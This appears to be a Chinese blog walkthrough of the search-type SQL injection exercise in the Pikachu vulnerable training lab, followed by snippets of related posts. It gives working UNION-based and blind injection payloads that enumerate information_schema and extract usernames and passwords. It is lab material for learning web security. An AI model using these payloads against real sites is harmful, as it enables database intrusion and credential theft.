pikachu靶场的搜索型注入

最新推荐文章于 2025-04-05 21:49:56 发布
最新推荐文章于 2025-04-05 21:49:56 发布
阅读量3.9k 收藏 5
点赞数 1
文章标签: 网络安全 sql
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/ranioe/article/details/121791183
版权
本文详细介绍了如何通过搜索型注入进行SQL注入攻击,首先通过测试注入点发现可注入情况,然后利用闭合方式猜测并验证SQL语句。通过判断字段数和回显位,成功获取了数据库名、用户名和版本。接着,通过查询information_schema获取表名和字段名,最终定位到username和password字段,展示了完整的攻击步骤和技巧。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

搜索型注入

搜索vince

在这里插入图片描述

测试该传参点是否可以注入

搜索vince’看看能不能注入

在这里插入图片描述
在这里插入图片描述

说明这个传参点可注入,并且返回了部分代码’%”

说明源代码不是使用”闭合的。猜测源代码的闭合方式’%username%’

猜测源代码的闭合方式’%username%’

使用语句:正确返回的内容 %’ 注入sql语句 #
在这里插入图片描述在这里插入图片描述

and 1=1 返回正常,and 1=2报错,说明可以开始注入

尝试mysql联合查询注入

先判断字段数

在这里插入图片描述在这里插入图片描述
在这里插入图片描述

在这里插入图片描述

当字段为4时报错,说明字段数为3。确定字段数为3

查询可回显位

在这里插入图片描述

说明字段1,2,3,都是可回显位

利用回显位查看数据库名,用户名,数据库版本

查库名函数database() 或者schema()
查用户名函数 user()
查数据库版本函数 version()
在这里插入图片描述

回显用户为root最高用户,数据库名为pikachu

知道数据库名后去判断数据库的表名、字段名
1.知道库名,先去查询表名

语句:vince%’ union select group_concat(table_name),2,3 from information_schema.tables where table_schema=‘pikachu’

在这里插入图片描述
猜测用户名应该存在users这个表下,所以我们需要去查users表下的字段名。

2.查users表下的字段名

语句:vince%’ union select group_concat(column_name),2,3 from information_schema.columns where table_name=‘users’
在这里插入图片描述
查询到关键字段名为username password

注意:这边的table_name=<‘table_name’>,表名一定不要写错。因为在information_schema.columns这张表下存储的是所有库的所有表的所有列信息,如果你写错了可能就查到其他的库下的表了。
我之前不小心把表名users写成了user就查到其他库下的表去了(下面一张图是错例)乍一看真看不出来,然后字段名是一样的后面就做对了。在这里插入图片描述

3.利用union select 的回显去查询账号密码

在这里插入图片描述

H311oWOrld
关注
Pikachu搜索型注入
xdjxi的博客
03-07 906
一、原理 “%”匹配任何字符,“like”的意思就是像,这句SQL的语句就是基于用户输入的pwd在users表中找到相应的password,正常用户当然会输入例如admin,ckse等等。 构造对应的闭合,闭合前面的单引号和百分号,注释后面的百分号和单引号。构造的payload如下 xxxx%’ or 1=1# 二、操作 打开进入界面: 然后我们可以输入’ and 1=1 order by x#通过order by x来确定字段数,时返回了正常页面然后我们可以输入’ and 1...
pikachu搜索型注入
weixin_43622525的博客
03-07 7111
目录 pikachu 简介 搭建 windows Docker SQL注入 搜索型注入 pikachu 简介 Pikachu是一个带有漏洞的Web应用系统,在这里包含了常见的web安全漏洞。 如果你是一个Web渗透测试学习人员且正发愁没有合适的靶场进行练习,那么Pikachu可能正合你意。 搭建 windows 搭建phpstudy环境,将pikachu解压在网站根目录进行搭建。 Docker docker build -t "pikachu" . docker run
pikachu靶场字符型注入+布尔盲注
最新发布
tengyuehou的博客
04-05 441
name=vince' and ascii(substr((select table_name from information_schema.tables where table_schema='pikachu' limit 0,1),1,1))=1 --+&submit=查询。name=vince' and%20 ascii(substr((select%20 username from pikachu.member limit 0,1),1,1))=1--+&submit=查询。
Pikachu靶场SQL-Inject之搜索型注入
witwitwiter的博客
04-21 707
Pikachu靶场SQL-Inject之搜索型注入 实验环境以及工具 Firefox浏览器、Burp Suite、Pikachu靶场 实验原理 数据库注入漏洞,主要是开发人员在构建代码时,没有对输入边界进行安全考虑,导致攻击着可以通过合法的输入点提交一些精心构造的语句,从而欺骗后台数据库对其进行执行,导致数据库信息泄漏的一种漏洞。 实验步骤 1.前期工作 先将Proxy中的intercept关闭,使其不进行拦截,让数据通过监听的端口。 2.注入点探测 在字符型注入中看到输入框,里面能够输入字符串。这里输
pikachu搜索型注入
weixin_50339082的博客
06-14 834
pikachu搜索型注入 一、原理 $sql="select * from user where password like '%$pwd%' order by password" “%”匹配任何字符,“like”的意思就是像,这句SQL的语句就是基于用户输入的pwd在users表中找到相应的password,正常用户当然会输入例如admin,ckse等等。 构造对应的闭合,闭合前面的单引号和百分号,注释后面的百分号和单引号。构造的payload如下 xxxx%’ or 1=1# 二、操作 打开进入界面
pikachu搜索型注入
2301_79595769的博客
12-23 302
判断搜索型注入的方法:1 搜索keywords‘,如果出错的话,有90%的可能性存在漏洞;2 搜索 keywords%,如果同样出错的话,就有95%的可能性存在漏洞;3 搜索keywords% 'and 1=1 and '%'='(这个语句的功能就相当于普通SQL注入的 and 1=1)看返回的情况4 搜索keywords% 'and 1=2 and '%'='(这个语句的功能就相当于普通SQL注入的 and 1=2)看返回的情况5 根据两次的返回情况来判断是不是搜索型文本框注入了。
pikachu靶场SQL注入
2201_75766364的博客
03-28 1312
程序员在编写web程序时,没有对客户端提交的参数进行严格的过滤和判断。用户可以修改参数或数据,并传递至服务器端,导致服务端拼接了伪造的SQL查询语句,服务端连接数据库,并将伪造的sql语句发送给数据库服务端执行,数据库将sql语句的执行结 果,返回给了服务端,服务端又将结果返回给了客户端,从而获取到敏感信息,甚至执行危险的代码或 系统命令。简单来说就是:注入产生的原因是接受相关参数未经处理直接带入数据库查询操作。
SQL注入pikachu靶场中的SQL注入通关
qq_68163788的博客
05-24 4120
SQL注入是一种常见的网络攻击技术,攻击者利用应用程序对用户输入数据的处理不当,通过在输入字段中插入恶意的SQL代码,从而实现对数据库的非法访问和控制。通过成功利用SQL注入漏洞,攻击者可以执行未经授权的操作,如删除、修改或获取敏感数据。在pikachu靶场中,玩家需要利用自己的技能和知识,深入了解SQL注入的原理和方法,通过不断尝试和实践,最终成功通关。这个过程不仅可以帮助玩家提升对SQL注入漏洞的识别和防范能力,还能加深对网络安全的理解和认识。
pikachu靶场SQL注入.docx
09-13
Pikachu靶场SQL注入中,我们可以使用FireFox浏览器或BurpSuite工具来测试字符型注入,通过测试,我们可以确定注入点。 Pikachu靶场SQL注入是非常危险的一种攻击手段,Web开发者应该采取措施来防止SQL注入攻击。
pikachu靶场 字符型注入sqlmap注入参数,针对GET方法)
wjwqp的专栏
03-02 2649
pikachu靶场 字符型注入可以用BurpSuit进行操作,可以获取到所有用户,但是要获取数据库的表内容我们还是用SQLMAP进行。 SqlMap注入中,上次是采用POST表单的注入,这次我们讲解GET方法取表的内容。 参数返回:GET /pikachu/vul/sqli/sqli_str.php?name=1&submit=%E6%9F%A5%E8%AF%A2 HTTP/1...
Pikachu SQL注入搜索型注入
SS_liang的博客
01-11 660
无论是搜索型还是字符型,都是需要找到闭合的方式也就是闭合的字符,然后进行sql注入:这里我直接梭哈,原理都一样就没必要再详细说一遍了,前面的文章都有: 最后结果就是:这题闭合符号是%'拿下!
pikachu闯关(三)---搜索型注入
weixin_75034911的博客
07-13 1372
根据提示信息,可以先随便输入一个,比如:o,得到如下结果:可以猜测出大概sql语句大概是:select username,uid,email from 表名 where username like '%o%',那么我们要进行注入就要形成闭环可以改为%’形成闭环,相当于成了:select username,uid,email from 表名 where username like '%o%' and 1=1 # %‘,其中 o%' and 1=1 # 这个为我们输入的内容。还是按照之前的步骤进行注入
pikachu SQL注入搜索型
ANYOUZHEN的博客
05-09 270
观察后端代码,尝试构造合法闭合 payload:xxxx%' or 1=1# 成功注入,#在MySQL数据库中起到注释的作用,可以去掉后面的代码
Pikachu靶场 搜索型SQL注入
感谢关注
12-23 697
输入下面的命令,再输入。
pikachu靶场--SQL-Inject(搜索型注入
2401_88387979的博客
12-02 247
数据库名称为:pikachu
pikachu之特殊注入搜索型注入、xx型注入、insert/update注入、delete注入、宽字节注入
2301_80661529的博客
03-02 1570
如果一个字符的大小是一个字节的,称为窄字节;如果一个字符的大小是两个字节的,成为宽字节。
pikachu 靶场数字型注入
03-29
<think>好的,用户需要关于Pikachu靶场中数字型SQL注入的实验教程。首先,我得回忆一下Pikachu靶场的结构,数字型注入和字符型注入的区别。数字型通常不需要闭合引号,直接注入即可。用户提供的引用中提到了使用'union select等语句,但数字型可能不需要单引号。 接下来,我需要整理实验步骤。首先应该搭建环境,确保Pikachu靶场已经部署好。然后找到数字型注入的入口,比如可能是某个查询参数是数字类型的页面。比如用户信息查询,参数是id=1这样的形式。 然后,测试注入点。使用1 and 1=1和1 and 1=2来判断是否存在注入漏洞。如果页面返回不同,说明存在漏洞。之后确定字段数,用order by来猜测列数。接着联合查询,获取数据库信息,比如数据库名、表名、列名,最后提取数据。 要注意引用用户提供的例子,比如使用database()函数获取数据库名,还有information_schema.columns来获取列信息。需要确保语法正确,比如闭合注释符--+或者-- -。 另外,用户可能需要防御建议,比如参数化查询,过滤输入等。还要生成相关问题,可能涉及其他类型的注入、工具使用或防范措施。 需要检查步骤是否清晰,是否符合实际操作,以及是否正确应用了引用中的示例。确保使用正确的LaTeX格式,变量用$...$,独立公式用$$...$$。同时用中文回答,结构分明,步骤详细。</think>### Pikachu靶场数字型SQL注入实验教程 #### 一、实验准备 1. 部署Pikachu靶场环境(推荐使用PHPStudy+源码包) 2. 访问数字型注入漏洞模块:`/vul/sqli/sqli_id.php` #### 二、注入步骤演示 1. **判断注入点** 输入`1 and 1=1`返回正常,`1 and 1=2`返回异常,说明存在数字型注入漏洞[^1]。 2. **确定字段数** 通过`order by`逐步测试: ```sql 1 order by 2--+ # 正常 1 order by 3--+ # 报错 ``` 确认字段数为2列。 3. **联合查询获取信息** ```sql 1 union select database(),2--+ # 获取当前数据库名pikachu ``` 4. **提取表结构** ```sql 1 union select group_concat(table_name),2 from information_schema.tables where table_schema='pikachu'--+ # 获取users等表名[^2] ``` 5. **获取敏感数据** ```sql 1 union select username,password from pikachu.users--+ # 提取账户密码哈希值 ``` #### 三、关键语法说明 - 数字型注入无需闭合引号,直接拼接SQL - `information_schema`系统库存储元数据[^2] - `group_concat()`函数聚合查询结果 - 注释符`--+`或`#`截断后续语句 #### 四、防御建议 1. 使用预处理语句: ```php $stmt = $pdo->prepare("SELECT * FROM table WHERE id = ?"); $stmt->execute([$id]); ``` 2. 强制类型转换:`intval($_GET['id'])` 3. 设置数据库最小权限原则
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值